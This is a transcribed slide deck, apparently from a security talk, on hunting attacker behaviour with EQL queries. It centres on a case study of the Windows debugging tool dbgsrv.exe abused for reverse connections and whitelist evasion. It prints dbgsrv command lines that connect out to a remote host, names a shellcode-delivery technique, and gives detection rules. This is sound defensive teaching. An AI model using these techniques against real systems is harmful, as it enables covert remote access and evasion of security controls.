  • 60. novum nexumus destination port process_path user_name vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual StudioInstallerresourcesappServiceHubServices Microsoft.VisualStudio.Setup.ServiceBackgroundDownload.exe NewtScamander storeedgefd.dsx .mp.microsoft.com 443 C:Program FilesWindowsApps Microsoft.WindowsStore_11706.1002.9.0_x64__8wekyb3d8bbwe WinStore.App.exe NewtScamander 10.10.10.10 8443 C:WindowsMicrosoft.NETFrameworkv4.0.30319 InstallUtil.exe NewtScamander www.bing.com 443 C:WindowsSystem32BackgroundTransferHost.exe NewtScamander 10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander 10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander watson.telemetry .microsoft.com 443 c:windowssystem32taskhostw.exe NewtScamander vo.msecnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7ServiceHub controllerMicrosoft.ServiceHub.Controller.exe NewtScamander ✔Microsoft ✔Microsoft ✔Microsoft
  • 61. novum nexumus destination port process_path user_name vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7IDEdevenv.exe NewtScamander vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7ServiceHubHosts ServiceHub.Host.CLR.x86ServiceHub.VSDetouredHost.exe NewtScamander vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7IDEPerfWatson2.exe NewtScamander vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7ServiceHubHosts ServiceHub.Host.CLR.x86ServiceHub.Host.CLR.x86.exe NewtScamander dc.services.visualstudio.com 443 C:Program Filesdotnetdotnet.exe SYSTEM ocsp.digicert.com 80 C:WindowsSystem32msiexec.exe SYSTEM vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019Communitycommon7ServiceHubHosts ServiceHub.Host.CLR.x86ServiceHub.RoslynCodeAnalysisS ervice32.exe NewtScamander
  • 62. novum nexumus destination port process_path user_name vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7IDEdevenv.exe NewtScamander vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7ServiceHubHosts ServiceHub.Host.CLR.x86ServiceHub.VSDetouredHost.exe NewtScamander vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7IDEPerfWatson2.exe NewtScamander vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019CommunityCommon7ServiceHubHosts ServiceHub.Host.CLR.x86ServiceHub.Host.CLR.x86.exe NewtScamander dc.services.visualstudio.com 443 C:Program Filesdotnetdotnet.exe SYSTEM ocsp.digicert.com 80 C:WindowsSystem32msiexec.exe SYSTEM vo.mscnd.net 443 C:Program Files (x86)Microsoft Visual Studio2019Communitycommon7ServiceHubHosts ServiceHub.Host.CLR.x86ServiceHub.RoslynCodeAnalysisS ervice32.exe NewtScamander ✔Microsoft
  • 63. novum nexumus destination port process_path user_name 10.10.10.10 8443 C:WindowsMicrosoft.NETFrameworkv4.0.30319 InstallUtil.exe NewtScamander 10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander 10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander
  • 64. novum nexumus destination port process_path user_name 10.10.10.10 8443 C:WindowsMicrosoft.NETFrameworkv4.0.30319 InstallUtil.exe NewtScamander 10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander 10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander ✘ Red Team
  • 65. novum nexumus destination port process_path user_name 10.10.10.10 8443 C:WindowsMicrosoft.NETFrameworkv4.0.30319 InstallUtil.exe NewtScamander 10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander 10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander ✘ Red Team
  • 67. nota vocatio Why is notepad.exe making outbound network connections? sequence by unique_pid [process where process_name == "notepad.exe"] [network where subtype.outgoing] process_name event_type subtype parent_process_path destination notepad.exe process create C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe notepad.exe network outgoing 10.10.10.10 notepad.exe process create C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe notepad.exe network outgoing 10.10.10.10
  • 68. nota vocatio What else did dbgsrv.exe do? any where event_type in ("process", "network", "file", "registry") and process_name == "dbgsrv.exe" | unique unique_pid, event_type, subtype 7 results found
  • 69. pid event_type subtype parent_process_name command_line destination 7268 process create explorer.exe "C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe" -t tcp:clicon=10.10.10.129,port=22 7268 network outgoing 10.10.10.129 7268 process terminate 4956 process create explorer.exe "C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe -t tcp:clicon=remotedebug.msdn.azure.com,port=22 8044 process create explorer.exe "C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe" -t tcp:clicon=remotedebug.msdn.azure.com,port=22 2680 process create explorer.exe "C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe" -t tcp:clicon=remotedebug.msdn.azure.com,port=22 2680 network outgoing 10.10.10.129 nota vocatio What else did dbgsrv.exe do?
  • 70. destination port process_path user_name 10.10.10.129 22 C:Program FilesDebugging Tools for Windows (x64)dbgsrv.exe NewtScamander 10.10.10.10 8443 C:WindowsSystem32notepad.exe NewtScamander novum nexumus ✘ New technique?
  • 71.
  • 72. DBGSRV: A Fantastic Red-Team Attack Think of this tool as giving you what is functionally equivalent to ● Reverse TCP Connection ● Process Hollowing ● Whitelist Evasion Disclosed to MSRC, cleared for disclosure. - It is a binary working as designed. It is not an exploit.
  • 73. DBGSRV : Reverse TCP Connection MSDN DbgSrv Command-Line Options
  • 74. DBGSRV : Deliver Shellcode & Execute
  • 75. DEMO
  • 76. DBGSRV: Detection ATT&CK T1127: Trusted Developer Utilities sequence [process where subtype.create and (process_name == "dbgsrv.exe" or original_file_name == "dbgsrv.exe") ] by unique_pid [network where subtype.outgoing] by unique_pid [process where subtype.create] by unique_ppid
  • 78. EQL Analytics Library ● Library of 100+ detections written in EQL ● Mapped to ATT&CK tactics and techniques ○ Automatically updated coverage ● Abstracted from specific data sources ○ Provide a mapping to your fields ○ Sysmon already implemented eqllib.readthedocs.io
  • 79. EQL Analytics Library [analytic.metadata] categories = ["detect"] confidence = "medium" contributors = ["Endgame"] created_date = "08/08/2019" description = "Detect dbgsrv.exe used to launch remote debuggers as a potential remote access tool" id = "70814733-e756-4eda-8840-5e16c49304f6" name = "DbgSrv Remote Debugger" os = ["windows"] tactics = ["Execution"] techniques = ["T1127"] updated_date = "08/08/2019" [analytic] query = ''' sequence [process where subtype.create and (process_name == "dbgsrv.exe" or original_file_name == "dbgsrv.exe")] by unique_pid [network where subtype.outgoing] by unique_pid [process where subtype.create] by unique_ppid '''
  • 80. Survey Says ==================================================================== count analytic_name ==================================================================== 1 Installation of Browser Extensions 1 Process Discovery 1 RegSvr32 Scriptlet Execution 1 Suspicious Script Object Execution 1 System Owner and User Discovery 2 Creation of Scheduled Task 2 Network Service Scanning via Port Scanning 2 Windows Discovery of Network Environment via Built-in Tools 3 Execution of Existing Service via Command 3 InstallUtil Process 6 Control Panel Items 6 Indicator Removal on Host 6 Stop Services with sc.exe 12 Windows System Information Discovery $ eqllib survey -f mydata.json.gz -c
  • 81. Identifying True Positives ● Build a baseline of your environment ● What do you find multiple times? ○ Track repeat offenders ○ Both installutil.exe and dbgsrv.exe triggered multiple detections Does it tell a story?
  • 82. Pitfalls of Behavioral Detection ● False positives from administrators and background software ○ Watch your ratio of false to true positives ● Lack of context to improve detections ○ True positives rarely occur in isolation ● Waiting for a red team to test posture ● Knee-jerk reactions to trending malware
  • 84. Install and configure Microsoft Sysmon on a Windows endpoint Detonate an Atomic Test to generate events Collect events as a JSON file using PowerShell Install Python then download EQL pip install eql Load the EQL shell with the command eql Load your data file within the shell input -f my_sysmon_logs.json DIY Red & Blue team
  • 85. Conclusion ● Understand what data sources you have ● Focus on commonly seen behaviors ● Practice on small known sets then scale up ● Test early, test often ● Know your resources ● Share with the community!
  • 86. Resources ● MITRE ATT&CK attack.mitre.org ● Atomic Red Team atomicredteam.io ● Event Query Language eql.readthedocs.io ● EQL Analytics Library eqllib.readthedocs.io bit.ly/fantastic19
  • 87. Thank You A number of people helped us along the way. Paul Ewing Devon Kerr Mike Haag Adam Shostack - BlackHat Speaker Coach